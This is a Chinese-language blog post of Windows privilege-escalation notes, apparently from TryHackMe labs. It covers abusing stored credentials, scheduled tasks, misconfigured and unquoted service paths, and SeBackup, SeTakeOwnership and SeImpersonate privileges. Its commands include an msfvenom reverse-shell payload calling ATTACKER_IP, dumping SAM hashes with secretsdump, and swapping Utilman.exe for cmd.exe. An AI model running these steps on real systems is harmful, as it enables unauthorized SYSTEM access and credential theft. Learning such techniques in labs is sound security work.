Windows提权

Administrator

2023-06-18

从常用位置获取密码:

通过cmdkey /list 可以查看存储在本地的用户凭证

然后可以通过runas命令以该身份的权限打开cmd

runas /savecred /user:admin cmd.exe

查询powershell历史执行记录:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

在powershell中要将%userprofile%换为$Env:userprofile

计划任务提权

schtasks /query /tn 任务名 /fo list /v

可以看到计划任务的可执行文件的地址以及权限

使用cacls可以看到目标文件的权限，如果可以编辑替换即可提权

服务错误配置提权

使用sc qc 服务名

可以看到服务关联的可执行文件地址，若有权限替换替换等服务重新运行的时候即可生效

msf生成脚本:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe

或者直接在注册表HKLM\SYSTEM\CurrentControlSet\Services\中看，如果服务文件配置了DACL，它将存储在名为 Security 的子项中

服务关联的可执行文件的地址若没加引号可能也会导致问题:

例如:

BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

SCM可能会依次尝试执行以下命令：

C:\MyPrograms\Disk.exe Sorter

C:\MyPrograms\Disk Sorter.exe Enterprise\bin\disksrs.exe

C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

因此只要有权限在该目录创建Disk.exe即可

拥有一些危险特权

`SeBackupPrivilege`

SeBackup 和 SeRestore 权限允许用户读取和写入系统中的任何文件，而忽略任何现有的 DACL。此权限背后的想法是允许某些用户在不需要完全管理权限的情况下从系统执行备份。

备份sam文件和system文件，然后使用secretdump获得hash，然后可以尝试PTH

C:\> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.

C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.

$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

SeTakeOwnership

可以使用utilman.exe 来提升权限。 Utilman 是一个内置的 Windows 应用程序，用于在锁定屏幕期间提供轻松访问选项

由于 Utilman 以 SYSTEM 权限运行，如果我们将原始二进制文件替换为我们喜欢的任何 payload，即可获得SYSTEM权限

首先获得它的所有权:

takeown /f C:\Windows\System32\Utilman.exe

然后授予当前用户对 utilman.exe 的完全权限:

icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

然后使用cmd.exe替换utilman.exe

锁定屏幕在登陆界面点击右下角轻松访问按钮即可打开一个具有SYSTEM权限的cmd窗口

SeImpersonate / SeAssignPrimaryToken

这些特权允许进程模拟其他用户并代表他们行事。模拟通常包括能够在另一个用户的安全上下文中生成进程或线程。

可以使用RogueWinRM提权或者烂土豆提权

提权信息搜集工具

WinPEAS

PrivescCheck